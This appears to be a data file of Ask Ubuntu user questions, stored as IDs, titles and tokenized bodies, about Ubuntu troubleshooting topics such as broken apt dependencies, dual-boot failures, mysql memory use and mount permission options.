429731	unmet dependencies when trying to update	long story short , my ubuntu 12.04 vm ran out of space and an update failed . i then increased the disk space but am no longer able to update anything using apt-get . this is the output of apt-get upgrade : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-headers-generic : depends : linux-headers-3.2.0-53-generic but it is not installed linux-image-generic : depends : linux-image-3.2.0-53-generic but it is not installed e : unmet dependencies . try using -f. after that i run apt-get install -f and get this output : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-generic linux-headers-generic linux-image-generic the following packages will be upgraded : linux-generic linux-headers-generic linux-image-generic 3 upgraded , 0 newly installed , 0 to remove and 57 not upgraded . 3 not fully installed or removed . need to get 6448 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 [ link removed ] precise-updates/main linux-generic amd64 3.2.0.59.70 [ 1718 b ] get:2 [ link removed ] precise-updates/main linux-image-generic amd64 3.2.0.59.70 [ 2370 b ] get:3 [ link removed ] precise-updates/main linux-headers-generic amd64 3.2.0.59.70 [ 2360 b ] fetched 6448 b in 0s ( 40.1 kb/s ) perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` en_us : en '' , lc_all = ( unset ) , lc_time = `` fi_fi.utf-8 '' , lc_monetary = `` fi_fi.utf-8 '' , lc_address = `` fi_fi.utf-8 '' , lc_telephone = `` fi_fi.utf-8 '' , lc_name = `` fi_fi.utf-8 '' , lc_measurement = `` fi_fi.utf-8 '' , lc_identification = `` fi_fi.utf-8 '' , lc_numeric = `` fi_fi.utf-8 '' , lc_paper = `` fi_fi.utf-8 '' , lang = `` en_us.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_all to default locale : no such file or directory dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.2.0-53-generic ; however : package linux-image-3.2.0-53-generic is not installed . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of linux-headers-generic : linux-headers-generic depends on linux-headers-3.2.0-53-generic ; however : package linux-headers-3.2.0-53-generic is not installed . dpkg : error processing linux-headers-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.53.63 ) ; however : package linux-image-generic is not configured yet . linux-generic depends on linux-headers-generic ( = 3.2.0.53.63 ) ; however : package linux-headers-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-image-generic linux-headers-generic linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) then i tried dpkg -- configure -a : dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.2.0-53-generic ; however : package linux-image-3.2.0-53-generic is not installed . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.53.63 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-headers-generic : linux-headers-generic depends on linux-headers-3.2.0-53-generic ; however : package linux-headers-3.2.0-53-generic is not installed . dpkg : error processing linux-headers-generic ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-image-generic linux-generic linux-headers-generic i 'm not that proficient with linux so i have no idea what to do next . any help is appreciated . uname -r says 3.2.0-58-generic .
429734	collect2 : error : ld returned 1 exit status	i want to install nexalign ( can be downloaded from here ) on ubuntu 13.10 . i previously installed it on ubuntu 10 without any problem . the error i got is : gcc -o9 -wall -dthread -lpthread main.o mapping.o interface.o input.o sarray.o mem.o output.o pattern_searching.o pattern_searching_solid.o string_matching.o time.o misc.o bt.o mapping_output.o hash.o r_output.o mapping_solid.o pattern_searching_short.o sort_mapping.o cluster_mapping.o -o nexalign mapping.o : in function `mapping ' : mapping.c : ( .text+0x21e ) : undefined reference to `pthread_create' mapping.c : ( .text+0x276 ) : undefined reference to `pthread_join' mapping.c : ( .text+0x410 ) : undefined reference to `pthread_create' mapping.c : ( .text+0x65e ) : undefined reference to `pthread_create' mapping_solid.o : in function `mapping_solid ' : mapping_solid.c : ( .text+0x1f4 ) : undefined reference to `pthread_create' mapping_solid.c : ( .text+0x23b ) : undefined reference to `pthread_join' mapping_solid.c : ( .text+0x3dc ) : undefined reference to `pthread_create' collect2 : error : ld returned 1 exit status make : *** [ all ] error 1 when i change the 5th line ( ld = -lpthread as ld = -l ) in make file the program was installed without any errors . i have basic knowledge in c/c++ . do i miss anything by converting the 5th line to `` ld = -l '' ? or do you have any suggestions ? i searched `` ask ubuntu portal '' to find answer , but i did not get a helpful one . thanks .
429737	how do i install steam on my ubuntu ?	my pc installed ubuntu12.04x86-64 but steam only for the 32bit , what should i do to run steam on my machine ?
429742	find and replace while typing command	i have typed out a long command in the bash but just as i typed the command i see that i have misspelled the command or argument . i want the cursor to go to the argument or command i have misspelled using inplace search instead of hitting arrow keys to go to the particular command or argument . e.g . ls *.txt | grep -e 'foo ' > > list_of_text_files_containing_foo.txt and i want to change foo in grep to bar by find and replace foo to bar inside the command without hitting arrow keys . is there a way to change all occurrences of foo to bar .
429743	setting max connections in mysql server globally	i installed my ubuntu 12.04.4 lts x64 yesterday and did n't installed anything except mysql-server and mysql-client . but htop showing 20 mysqld identical processes . * -- process -- -- - mem % -- -virt -- - res -- - shr -- -* | mysqld 3.6 481m 1269 136 | | mysqld 3.6 481m 1269 136 | | mysqld 3.6 481m 1269 136 | | mysqld 3.6 481m 1269 136 | | mysqld 3.6 481m 1269 136 | | mysqld 3.6 481m 1269 136 | | mysqld 3.6 481m 1269 136 | | mysqld 3.6 481m 1269 136 | ... . . how could i tell mysql to limit the number of processes it creates and i want to do it in global scales ? for a full fledged vps with only 1gb of ram what value is desirable ? as you can see each process uses 3.6 % of total memory and consuming about 778 mb of memory . which is a lot in a box with 1gb of memory . i want to know if it is possible either : - to reduce the memory that each mysqld process uses - or to reduce the number of the process .
429746	youtube-dl stopped working	on my 12.04 lts i ca n't download from youtube via youtube-dl . i used to do that , but recently ( for a week ) i 'm not able . i tried on many videos and i get same output : $ youtube-dl -t http : //www.youtube.com/watch ? v=sh0ciyuxbja [ youtube ] setting language [ youtube ] sh0ciyuxbja : downloading video webpage [ youtube ] sh0ciyuxbja : downloading video info webpage [ youtube ] sh0ciyuxbja : extracting video information traceback ( most recent call last ) : file `` /usr/bin/youtube-dl '' , line 4645 , in < module > main ( ) file `` /usr/bin/youtube-dl '' , line 4636 , in main _real_main ( ) file `` /usr/bin/youtube-dl '' , line 4620 , in _real_main retcode = fd.download ( all_urls ) file `` /usr/bin/youtube-dl '' , line 869 , in download ie.extract ( url ) file `` /usr/bin/youtube-dl '' , line 1135 , in extract return self._real_extract ( url ) file `` /usr/bin/youtube-dl '' , line 1406 , in _real_extract url_map = dict ( ( ud [ 'itag ' ] [ 0 ] , ud [ 'url ' ] [ 0 ] + ' & signature= ' + ud [ 'sig ' ] [ 0 ] ) for ud in url_data ) file `` /usr/bin/youtube-dl '' , line 1406 , in < genexpr > url_map = dict ( ( ud [ 'itag ' ] [ 0 ] , ud [ 'url ' ] [ 0 ] + ' & signature= ' + ud [ 'sig ' ] [ 0 ] ) for ud in url_data ) keyerror : 'sig' it seems it 's some signature problem . i still can download videos via vlc . but i like youtube-dl - its faster . i did already : sudo apt-get -- purge remove youtube-dl sudo apt-get install youtube-dl sudo youtube-dl -- update ... but it did n't help .
429747	apt-get update taking too long	this is my first post here , i have some ubuntu problems . i installed ubuntu 12.04.04 then when i try apt-get update it takes up to 3 mins then `` some index files failed to download.they have been ignored . or old ones used instead
429749	issues with ubuntu/win7 dual boot	hi i 'm a newbie to linux and have been interested in trying it out . my wife has no interest in it so i 'm forced to create a dual os situation but i 've really run into a brick wall here . i 've done as much google searching and read as many tutorials as i can but this just is n't working . i have two hdds that i can use . one has win7 installed , but as soon as i installed ubuntu on the other drive windows refuses to boot . i tried using my 7 disk to repair the bootloader which did n't work , and i also tried to install grub which also did not work . any help would be appreciated .
429753	nginx and pagespeed installation issues in ubuntu	i have put my app ( implemented a website with the help of angularjs ) on amazon ec2 and have installed nginx and thin on it i am having issues with angularjs with respect to performance . so i decide to install pagespeed with recommendation of my seniors . i am following the steps from here and here . however i am stuck with ./configure -- add-module= $ home/ngx_pagespeed-release-1.7.30.3-beta i do n't know the meaning of ./configure . i do n't have such a file or directory in nginx path . i had installed nginx before so i skipped the part where we have to install nginx server . also i have installed the pagespeed module in root directory and nginx on /etc/nginx . is this why it is giving me issues and how do i solve this . do i need to reinstall nginx ? please help me with this .
429754	nm-applet notifications prevent typing in login manager	to manage my ( wireless ) network connections i use nm-applet . every time i start my system there pops an notification up which says disconnected and a few seconds later a second one connected to ... . these notifications somehow prevent me from typing my user name and password in the login manager ( lightdm ) . i have to manually click on the notifications to get rid of them and type afterwards . i already found a workaround by disabling all nm-applet notifications ( explained here ) . however sometimes these messages are quite useful . is there an other way to solve this problem ?
429755	ubuntu email server identifies as junk !	i set the email server with postfix and dovecot . but when i send emails from my server to gmail , live and other major email services they put the email in the junk or spam folder . what is wrong ? what should i do to help the situation and prevent emails to identify as junk ? is this related to my vps ip address ?
429758	how do i access empathy after is has been `` started hidden ''	when i start empathy with the -- start-hidden switch at session startup , it 's very hard to access it afterwards . even if i receive a message , i wo n't see any windows when i click the icon in the launcher or indicator . /usr/bin/empathy -- start-hidden as a related problem , chat windows are sometimes opened on a non existing second screen . i can still see it when i press alt+tab , but i ca n't move it to my main screen .
429759	can i upgrade 12.04 to 14.04 on a live usb with persistent partition ?	i am running ubuntu 12.04 from a live usb hard drive with casper-rw partition and thinking of upgrading it to 14.04 . i know that i can not ( and should not ) upgrade the kernel ( i set apt to lock kernel-related packages ) but i hope it 's possible for other parts of the os . the process may be : - upgrade the release using the update manager ( if possible ) - re-create the live usb thanks .
429761	cant ( apt-get ) update	so here is how it goes . i have recently installed a fresh ubuntu install ( 12.04.04 ) server . i tried to update . it takes like 10 mins http : //postimg.org/image/n3yepsahr/ and after the 10 mins this shows http : //postimg.org/image/tkfydkmdp/ i would really appreciate any help from any user . thanks . edit : and when i try to write any ( apt-get ) this shows ( www. ) postimg.org/image/6712eny63/ . if u want me to ss any file for example . sources.list please just type it in the comments . remove the ( ) from the www . to open the img . ( it doesnt let me post more than 3 links )
429762	restoring lost data : `` this partition ca n't recovered . ''	i need someones help to my newly installed ubuntu 13.10 64-bit version . so , at first , i will use live session from my usb flash drive that has ubuntu inside . and then after i get back to my operating system , windows 7 , and then it take too long that it only shows `` _ '' repeating with a black background . and then i decided to go on with ubuntu , and i see delete windows all the files and install ubuntu ( before that when i was using live session ubuntu , i already searched for how to restore lost files or partition if ubuntu format my hard drive ) and then it start installing and i waited and i restarted it on finish . so now here is my problem , i ca n't restore my lost partition , i already tested any solution on internet . i used testdisk . after i do all things from deep search , i chose my lost partition then it says `` this partition is ca n't recovered . '' what should i do ?
429768	vm virtualbox does n't allow to enable 64-bit guest on ubuntu 12.04 and lenovo g500s	i 've installed vm virtualbox v. 4.3.8 on my ubuntu 12.04 lts ( lenovo g500s with intel 1005m processor ) and i ca n't configure any 64-bit guest ( nor windows , neither other os ) . inslalation of win 8.1 64-bit under 32-bit profile obviously fails ... my processor supports vt-x technology , but in my bios there is no enable/disable option for vt-x . is there any way to force virtualbox to support 64-bit guest ?
429769	dual sim support	i 'm wondering if ubuntu touch will fully support dual-sim smartphones ? i.e . separate address books ( contacts ) , two separate whatsapp accounts ?
429770	will deselected updates show up again ?	i think i mistakenly unchecked a box before installing updates . so the updates were installed , but one was skipped , because i’d unintentionally deselected it . will ubuntu offer me that update again , or will it remember that i deselected it and not show it again ? is there any way to check whether i’m missing any updates ? i tried running an update in the terminal , and it didn’t show anything . timothy @ timothy-vostro-220-series : ~ $ sudo apt-get update ... timothy @ timothy-vostro-220-series : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . it’s possible that i didn’t deselect an update . i’m not sure . i think i did . as i said , it was a mistake . it’s possible that i did deselect an update , and that update has since been offered to me again and installed in a subsequent batch of updates . it’s possible that i did deselect an update , and ubuntu is remembering that i deselected it , and not offering it to me again . for what it’s worth , i think it was a kernel update .
429771	ubuntu 13.10 how to enable numlock at boot time for login screen ?	i found this how to enable numlock at boot time for login screen ? but after i performed this steps ( luvr answer from apr 29 '12 at 20:11 ) : ensure that numlockx is installed : sudo apt-get install numlockx edit the file /etc/lightdm/lightdm.conf gksudo gedit /etc/lightdm/lightdm.conf add the following line to the file : greeter-setup-script=/usr/bin/numlockx on after theese steps i rebooted the pc , and i can no longer be run ubuntu . why ubuntu drastically limits the system setup options . through the gui and deny basic settings such as on num lock on the log screen . and user must look for different solutions which can damages their system . thank you community very much : (
429774	ubuntu & windows	as i said in another post , i 'm a new ubuntu user . i 've installed ubuntu and i did not delete windows 7 , but after installing ubuntu , windows was in boot menu but when i clicked on windows to load , i see this error : a disk read error occured press ctrl+alt+ del to restart i 'm using ubuntu right now , but i ca n't switch to windows .. i do n't know what to do in order to have ubuntu and windows simultaneously ..
429779	abnormal behaviour of layout toggle led indicator	i have installed ubuntu trusty in my desktop pc . i use latin ( english us ) and greek keyboard layout . i have changed the default key-combination ( super+space ) to ( shift+alt l ) in order to toggle between the two . my problem is this : i have the num lock on and the corresponding led is on . when i press the layout toggle combination ( shift+alt l ) the layout changes and the num led turns off . i can still type numbers though by the numerical pad . when i toggle again the layout changes , but the num led keeps still off . this weird behaviour shows even if i change the combination to the initial default ( super+space ) . at this point , i must inform you that the dconf setting ( org > gnome > desktop > applications.input-sources > xkb-options ) is [ 'grp : alt_shift_toggle ' , 'grp_led : scroll ' ] , meaning that the scroll lock should be turned on - off when i toggle layouts . i must also point out that the shown parameter 'grp : alt_shift_toggle ' keeps the same even when i have changed the key compbination to default ( super+space ) . any ideas how to make it work as it should ( scroll lock led on ) when gr layout is used ? thank you for your attention .
429781	less output does not show output in terminal after quitting it	previously , if i ran something | less , and then press q , it used to return me to the prompt with the output of less still visible . $ seq 1 100 | less 1 2 3 4 : q $ < prompt here . i can still see the output of less > but now , after i installed zsh ( with oh-my-zsh . it does n't work in bash too ) , the terminal looks like this : $ seq 1 100 | less < less shows up , i press : q and it is cleared > $ < prompt here . output of less disappears. > i searched for a less config file and found none . is there any way i can get less to behave the previous way ? having the output visible is very handy .
429783	youtube song controll audiomenu	i have a question . in ubuntu 13.04 i had the option to controll things in a youtube playlist from the audiocontroll menu in the toppanel . it looked like this but then with youtube grooveshark song controll in audiopanel so my question . how can i get it that song controll for youtube in my audiocontrol
429787	width of ps output	i have used foreman to export an upstart config . there are a lot of long environment variables so the processes started include some with a long command like : -su -c cd /home/ubuntu/project/2014-03-05-3ff545d ; export port=5000 ; export base_url=http ... .. ; command_to_run however the ps output on a bash terminal is truncated and misses some of the exported environment variables and the command_to_run part on the end . according to man ps | grep wide : w wide output . use this option twice for unlimited width . using ps aux -w -w or ps aux ww or ps auxww still does not give me all of the command . edit 1 htop and cat /proc/ < pid > /cmdline does n't give the full output either , with the command truncated again to 4096 characters .
429791	how to set fqdn from bash script	is it possible to set the fully qualified domain name from a bash script ? i am using ubuntu 12.04 lts . i have an autoscaling group on amazon and i am using puppet for configuration . for example , i would like to use admin.staging.mycompany.net as a fqdn for all instances in the autoscaling group . i can run a bash script when the autoscaling group fires new instances . since puppet uses the fully qualified domain name to figure out which manifest to apply , i need to come up with a way to set a new ec2 instance 's fqdn from a bash script , so the autoscaling group can fire up a new instance and apply the correct puppet manifest . i do n't want to ssh to instances and manually change /etc/hosts and /etc/hostname as that would defeat the point of the autoscaling group .
429795	shortcut to return realpath of the symlink ?	is there any shortcut to return actual path of the symlink ? like : i have created a symlink in home $ cd $ ln -s /home/usr/workspace/helloworld/datadir datadir $ ls -l lrwxrwxrwx 1 usr usr 10 mar 5 16:57 datadir - > /home/usr/workspace/helloworld/datadir now , $ cd datadir $ pwd /home/usr/datadir here is there any way get back to /home/usr/workspace/helloworld/ directory without typing whole path $ cd ../ this takes me back to home directory !
429796	recovering an unbootable ubuntu	today i was trying to install 32 bit wine to my 64 bit pc and even though i knew that it may hurt my ubuntu setup , i ran a sudo command which deleted build-essantials , some compilers and drivers . after rebooting my system , ubuntu got stuck at booting screen and it gave an error that said : . could n't write bytes : broken pipe i then googled this problem but could n't try any given suggestions/solutions since i neither could boot my pc nor enter to the command mode by pressing ctrl + shift +f1 or ctrl + alt + t. i would go with a format in this situation but i have some files on my system that are not backed up on anywhere . is there any way of installing a second ubuntu and recovering the first setups documents ? or any other way that i could recover the files i want ? what are my options ? thanks .
429797	how can run a gsettings command inside a postinst script from a custom .deb package ?	i want to change the wallpaper when a custom .deb package is installed . in the postinst script i 've written this : pid= $ ( pgrep gnome-session ) export dbus_session_bus_address= $ ( grep -z dbus_session_bus_address /proc/ $ pid/environ | cut -d= -f2- ) dbus-launch gsettings set org.gnome.destkop.backgroun picture-uri âfile : ///path/photo.pngâ i see dconf value is changed , but nothing else happens ( wallpapers is n't changed ) , although my photo appears as the current wallpaper in `` gnome-control-center background '' . ( wtf ! ! ? ? ) . moreover , when i logout and login again , the former dconf value returns as if i had n't done anything . i 'm going crazy . thanks !
429799	accidentaly deleted contents of the home folder	so , i wanted to rename the user and its corresponding home folder following the instructions mentioned here how do i change my username ? . however , what this made me is to rename the account , not the folder , and apparently i deleted all the contents of the home folder ! now i am also not able to log into the account through the ubuntu 11.04 desktop version and frankly i am a bit lost on how to solve this issue cause i do have a valuable data in the home folder . ls -la of the folder : dr-x -- -- -- 3 sheldon sheldon 4096 mar 5 12:31 . drwxr-xr-x 5 root root 4096 mar 5 12:04 .. -rw -- -- -- - 1 root root 2013 mar 4 17:44 .bash_history any ideas ? how can i restore everything as it was and get my data back ? thanks a milion !
429801	is it possible to have , at the same time , unity notifications in unity and xfce notifications in xfce ?	if one has both unity and xfce desktop environments installed in ubuntu , is it possible ( and how ) to have them work correctly without one of them taking the place of the other ? i want to have unity 's notifications when i log in using the unity environment and to have xfce 's notifications when i log in using xfce . thank you .
429803	can not add ppa . please check that the ppa name or format is correct	internet connection is working . apt-get is working . trying to add ppa : cooperjona/lightread but an error has raised : can not add ppa 'ppa : cooperjona/lightread ' . please check that the ppa name or format is correct . i supposed there is an error in writing or in the ppa . i tried also the 'ppa : tombeckmann/ppa ' but with same error .
429805	how do i disable the guest account on ubuntu 13.10 ( saucy )	yes ! i want to get rid of the guest account on ubuntu . how do i do this ? ? i do not want this account but neither i find it in /etc/passwd and /etc/group nor within the users by navigating to system settings - > user accounts ...
429806	what are the system monitor applications avaliable ?	may i know what are the system monitor applications available in ubuntu ( gui/cli ) ?
429809	netbeans does n't load modules for regular users	i wanted to install the updates on netbeans7.4 but i could n't as a regular user so i opened netbeans with sudo and it worked . after that , i ca n't open netbeans as a regular user , just with sudo . that splash screen appears , tries to read the module storage and just disappears without opening netbeans or a error message . i tried to open netbeans through the terminal to see whether a error appears , but nothing , when the splash screen disappears a new prompt occurs without any error message . i even tried to change the owner and group of the whole /usr/local/netbeans7.4/ directory but without any success . what did i wrong and can anybody help ?
429810	why ca n't i install my printer	have samsung scx-4521f . even have the installation desk but ca n't install correct driver.best so far is nearest driver selection in ubuntu database . it activates the printer but do n't print anything . i 'm a new user , checking out ubuntu . up to now i liked it well but not impressed with this barrier . marv
429817	what are the necessary applications required for building ubuntu touch apps ?	can someone please tell what are the necessary applications for building ubuntu touch apps ( ubuntu for phone ) ? i have ubuntu 13.10 installed on my laptop .
429825	brother dcp-195c scanner not identified	i 'm having trouble getting my brother dcp-195c recognized as a scanner on ubuntu 12.04 . i 've installed the drivers from brother , but scanning programs , like scangui or xsane can not see the device . i checked with sane-find-scanner and the scanner is listed : found usb scanner ( vendor=0x04f9 [ brother ] , product=0x0222 [ dcp-195c ] ) at libusb:005:002 i added the udev rules as well to /etc/udev/rules.d/60-libsane.rules : # brother attrs { idvendor } == '' 04f9 '' , env { libsane_matched } = '' yes '' i 've also tried linked the files from /usr/lib64/ into /usr/lib/ . what else can i try ?
429828	downloading urls with backslashes with wget or curl from iis server	i was trying for some time to find out why i could not download a url like this : http : //domain.com/dir/msrubbish.aspx ? urlpath=d : \2014\ac_001\english\ac001_fin_e_182.pdf the urls were pointing to a windows iis server . i have mimicked the headers exactly as they are in the browser , but nothing works .
429830	enable repeat for a specific key	my `` down '' key has died tonight . while waiting for a new keyboard , i am using the answer here to map the right ctrl ( key code 105 ) so that it acts as `` down '' : how do i remap certain keys ? long story short : xmodmap -e `` keycode 105 = down '' i then enabled repeat : xset r 105 this last command seems to work in some cases ( this very input box ) , but not many others ( repeat wo n't work for scroll down in chrome , nor in the terminal input . any hints on why ?
429832	problems installing ubuntu 12.04.4 with wubi	somebody please help : ( have no idea what i 'm doing wrong.. i installed the wubi.exe file en when i try to install i get this error . 03-05 13:53 error tasklist : error executing command command=c : \windows\sysnative\bcdedit.exe /set { 78d55937-1192-11e1-aa30-89d14f8f6785 } device partition=o : retval=1 stderr=er is een fout opgetreden tijdens het instellen van de elementgegevens . de aanvraag wordt niet ondersteund . stdout= traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in call file `` \lib\wubi\backends\win32\backend.py '' , line 697 , in modify_bcd file `` \lib\wubi\backends\common\utils.py '' , line 66 , in run_command exception : error executing command command=c : \windows\sysnative\bcdedit.exe /set { 78d55937-1192-11e1-aa30-89d14f8f6785 } device partition=o : retval=1 stderr=er is een fout opgetreden tijdens het instellen van de elementgegevens . de aanvraag wordt niet ondersteund . stdout= 03-05 13:53 debug tasklist : # cancelling tasklist 03-05 13:53 debug tasklist : new task modify_bcd 03-05 13:53 error root : error executing command command=c : \windows\sysnative\bcdedit.exe /set { 78d55937-1192-11e1-aa30-89d14f8f6785 } device partition=o : retval=1 stderr=er is een fout opgetreden tijdens het instellen van de elementgegevens . de aanvraag wordt niet ondersteund . stdout= traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in call file `` \lib\wubi\backends\win32\backend.py '' , line 697 , in modify_bcd file `` \lib\wubi\backends\common\utils.py '' , line 66 , in run_command exception : error executing command command=c : \windows\sysnative\bcdedit.exe /set { 78d55937-1192-11e1-aa30-89d14f8f6785 } device partition=o : retval=1 stderr=er is een fout opgetreden tijdens het instellen van de elementgegevens . de aanvraag wordt niet ondersteund . stdout= 03-05 13:53 debug tasklist : new task modify_bcd 03-05 13:53 debug tasklist : new task modify_bcd 03-05 13:53 debug tasklist : new task modify_bcd 03-05 13:53 debug tasklist : new task modify_bcd 03-05 13:53 debug tasklist : new task modify_bcd 03-05 13:53 debug tasklist : new task modify_bcd 03-05 13:53 debug tasklist : new task modify_bcd 03-05 13:53 debug tasklist : # # finished modify_bootloader 03-05 13:53 debug tasklist : # finished tasklist
429833	help ! ubuntu 13.10 boots forever after installing lamp-server	i installed ubuntu 13.10 and it worked fine . then i needed lamp server so i found how to install it using tasksel . i installed tasksel and ran lamp server installation . after that an undisclosed error popped out ( unfortunately i ca n't remember but it was something like `` error occured somewhere . `` , nothing specific ) . also half of the icons dissapeared from launch bar on the left and also on top ( but they still worked , only there was no icon ) . i thought that restart would help so i restarted the computer . after that the system always hangs on the black screen with `` ubuntu 13.10 '' and progress bar in the center . i tried recovery mode , going into the root console mode and removing all the lamp server packages but it did n't help . then i updated grub , also no effect . i pretty much lost there and i spent about a whole day configuring the system , installing programs , etc . so i 'd really rather do n't reinstall it completely . any suggestions ? update : if i hold the esc key to see the messages during the boot process i get : starting crash report submission daemon [ fail ] starting lightdm display manager [ fail ] starting send an event to indicate plymouth is up [ fail ]
429836	kubuntu 13.10 network manager and nm-applet not starting	i have to start them how can i make this happen at boot . i think this happened at upgrade time from 13.04 to 13.10 what i have to do : $ sudo service network-manager start $ nm-applet
429837	ubuntu distribution upgrades : move all user interaction to the end ?	is there a way to move all user interaction that occurs during a release upgrade to the end of the upgrade process ? as it currently stands , the ubuntu upgrade process will be interrupted whenever some user interaction is required . in particular , whenever ubuntu tries to upgrade a package , and finds that i have modified some configuration file that belongs to that package , it will ask me what to do . this behavior is quite annoying . i can not launch the update and go away , because sooner or later there will be a popup and the upgrade utility wo n't do anything until i click somewhere . ( the questions make sense.1 i do not criticize the questions per se , but the way the upgrade utility goes about asking them . ) could ubuntu not simply perform all the package upgrades , as it is going to anyway , and then , at the very end , display one single pop-up with a list of all those questions , so that i can simply check them off one by one ? bulk-moving all these questions to the end of the upgrade process would be so much more efficient . it would allow me to launch an upgrade in the evening , come back in the morning , and take care of all those little details in one sweep . technically it should n't be a problem at all . the upgrade utility can easily keep track of which files it is going to ask me about . it could even do it on the run , adding questions to the pop-up as it goes , so that users who like the current behavior can stick with it , but the upgrade process wo n't get interrupted if a user does n't answer right away . summing up , is there a way to move all those questions to the end ? if not , is there a reason for this behavior ? generally , would bulk-moving all those questions to the end of the installation process be a good idea ? should i make a feature request ? should there not be such a feature , and if the question stirs enough interest , i will definitely make a feature request , and we 'll see what the devs have to say . : ) 1 on the one hand , if i 'm running a server with a lot of customized configuration files , i do n't want an upgrade to remove them or mess them up . on the other hand , configuration file formats may change , and so with package updates my customized configuration files may need manual massaging .
429838	how can i customise my sound settings so that i can get alerts when my power reaches 12 % or below ?	currently i 'm having only visual alert..and these wo n't show up when i 'm watching a movie or something..
429839	why it is needed to update the linux-images in ubuntu	i had recently updated the linux image and kernel files.i found that after doing it , my system resolution becomes like a ( without display driver ) fonts , icons are big big..so ... .when entering to that updated generic images..while with the old i found its good and normal ... hence why we need to update it the images ... . kindly the info of that is 3.5.0-23-generic ( old and good display of my monitor ) while new updates is 3.5.0.45-generic ( where everything looks big ) so i need to know why its happens and why to update this images
429847	installed win8.1 installer with error to /dev/sdc1 grub is removed and nothing boots	i installed win 8.1 enterprise trial installer to /dev/sdc1 . lubuntu 14.04 is on /dev/sdc2 . the windows usb/dvd download tool showedunable to run bootsect to make the usb device bootable error at finish . i know some of you wont help me because i mentioned windows but i dont really like windows except for games and now nothing works . i just wana boot lubuntu again and the 8.1 installer so i can install it to hdd for gaming . important differences from `` duplicates '' win 8.1 installer doesnt boot.nothing boots . i tried boot repair but the repository gives me 404 i tried grub-install but fails cuz i cant use 64 bit live usb so chroot fails.im stuck woth this for a few days because i only have 32 bit cpus here and i can only fix this until i get there i think . fdisk -l disk /dev/sda : 40.0 gb , 40000000000 bytes 255 heads , 63 sectors/track , 4863 cylinders , total 78125000 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x4cc14cc0 device boot start end blocks id system /dev/sda1 * 63 20482874 10241406 7 hpfs/ntfs/exfat /dev/sda2 20482875 78108029 28812577+ f w95 ext 'd ( lba ) /dev/sda5 20482938 78108029 28812546 7 hpfs/ntfs/exfat disk /dev/sdb : 4026 mb , 4026531840 bytes 2 heads , 63 sectors/track , 62415 cylinders , total 7864320 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x01f9e9ac device boot start end blocks id system /dev/sdb1 * 64 7864319 3932128 b w95 fat32 disk /dev/sdc : 16.0 gb , 16022241280 bytes 64 heads , 32 sectors/track , 15280 cylinders , total 31293440 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00045e58 device boot start end blocks id system /dev/sdc1 * 63 7731199 3865568+ 7 hpfs/ntfs/exfat /dev/sdc2 * 7731200 27096434 9682617+ 83 linux /dev/sdc3 27097088 31293439 2098176 82 linux swap / solaris parted -l model : ata wdc wd400bb-75fr ( scsi ) disk /dev/sda : 40.0gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 32.3kb 10.5gb 10.5gb primary ntfs boot 2 10.5gb 40.0gb 29.5gb extended lba 5 10.5gb 40.0gb 29.5gb logical ntfs model : chipsbnk v3.1.0.4 ( scsi ) disk /dev/sdb : 4027mb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 32.8kb 4027mb 4026mb primary fat32 boot model : kingston datatraveler 3.0 ( scsi ) disk /dev/sdc : 16.0gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 32.3kb 3958mb 3958mb primary ntfs boot 2 3958mb 13.9gb 9915mb primary ext4 boot 3 13.9gb 16.0gb 2149mb primary linux-swap ( v1 ) error : /dev/zram0 : unrecognised disk label `
429848	`` dmask '' and `` fmask '' mount options	i tried this command to mount manually : sudo mount -t vfat /dev/sdb1 /media/external -o uid=1000 , gid=1000 , utf8 , dmask=027 , fmask=137 i am not getting what dmask and fmask does here . i know they are used to set up permissions , but when i check permissions of files and folders inside the mounted directory , they are not the same as i set using fmask and dmask . so , what are they actually doing ?
